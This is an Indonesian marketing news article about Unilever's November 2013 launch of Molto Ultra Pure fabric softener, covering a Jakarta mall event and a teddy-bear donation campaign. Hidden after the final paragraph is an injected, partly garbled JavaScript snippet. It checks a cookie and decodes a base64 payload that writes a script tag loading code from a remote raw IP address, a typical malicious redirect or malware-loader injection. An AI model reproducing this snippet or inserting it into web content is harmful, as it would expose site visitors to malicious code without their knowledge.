Molto Masih Fokus Membidik Pasar 'Family'

Menurut American Academy of Dermatology, pakaian menjadi salah satu iritan pada 10-20% anak dan 1-3 % dewasa. Jumlah kasus pada anak, terutama bayi, lebih tinggi karena kulitnya masih rentan dibandingkan orang dewasa. Oleh karena itu, perawatan pakaian pada akhirnya menjadi salah satu faktor untuk diperhatikan dalam menjaga kesehatan kulit karena penggunaan pelembut pakaian yang memberikan kelembutan maksimal dapat meminimalkan gesekan.

Sebagai upaya menyukseskan varian terbarunya, Molto Ultra Pure, Unilever menggelar aktivitas merek bertajuk Molto Ultra Pure Playground, pada 24-25 November 2013 di Atrium Mal Taman Anggrek, Jakarta.

Berdasarkan fakta tersebut, Unilever melalui produk Molto meluncurkan varian terbarunya, Molto Ultra Pure, pada Sabtu (23/11), di Jakarta. Sebagai upaya menyukseskan produk tersebut, Unilever pun menggelar kampanye bertajuk “Molto Ultra Pure Playground”yang digelar selama dua hari (24-25 November 2013) di Atrium Mal Taman Anggrek, Jakarta, dan sekaligus penutup rangkaian gerakan “Berbagi Pelukan Melalui Kelembutan” yang telah dilakukan sebelumnya.

Pauline Liongosari, Brand Manager Molto PT Unilever Indonesia, Tbk., mengatakan, “Molto Ultra Pure merupakan varian terbaru kami yang fokus membidik keluarga yang memiliki balita sebagai target utama kami. Dengan memberikan kelembutan maksimal, Molto Ultra Pure tak hanya membantu merawat pakaian keluarga tetapi juga semakin mempererat hubungan anggota keluarga.”

Terkait gerakan “Berbagi Pelukan Melalui Kelembutan” yang digelar sejak September 2013 lalu, Molto melakukan aksi menyebarluaskan kelembutan kasih sayang dengan pemberian donasi berupa boneka beruang Molty. Gerakan ini diinisiasi Molto untuk menyadarkan keluarga Indonesia akan pentingnya pelukan yang penuh kelembutan, terutama bagi anak-anak yang kurang beruntung.

Berdasarkan data Kementerian Sosial RI tahun 2010, masih ada sekitar 5,4 juta anak yatim piatu di Indonesia yang mendambakan lembutnya sebuah pelukan. Pauline kembali menjelaskan, “Gerakan ’Berbagi Pelukan Melalui Kelembutan Molto Ultra Pure’ membentuk chain of love (rantai cinta), dimana Molto menginspirasi para konsumen untuk berbagi pelukan melalui simbol donasi boneka beruang kepada anak yang kurang beruntung.”

Ribuan boneka Molty yang terkumpul untuk donasi, imbuhnya, akan dibentuk menjadi satu boneka Molty raksasa setinggi delapan meter. Boneka Molty raksasa ini juga berhasil mencatatkan rekor MURI sebagai “Replika Beruang dari Rangkaian Boneka Beruang Terbanyak”, kemudian akan dilepaskan satu per satu untuk dibagikan kepada anak-anak kurang beruntung.

“Dalam event Molto Ultra Pure Playground, pengunjung bisa menyaksikan pemecahan rekor MURI boneka Molty raksasa, berbelanja Molto Ultra Pure dan mendonasikan Molty serta memasangkannya langsung di Molty raksasa, mendonasikan boneka lama untuk anak-anak yang kurang beruntung, dan juga beberapa aktivitas anak, seperti bermain mandi bola, berkreasi dengan kain flanel dan membuat barang unik. Selain itu, ada talkshow untuk konsumen serta dimeriahkan oleh penampilan dari talenta muda berbakat seperti Popzelle, Kids Love Disco dan Angel Pieters,” kata Pauline. function getCookie(e)\(\)\\\\/\+^])/g,"\\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time)

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Sign In

Get the most out of SWA by signing in to your account

(close)

Register

Have an account? Sign In
(close)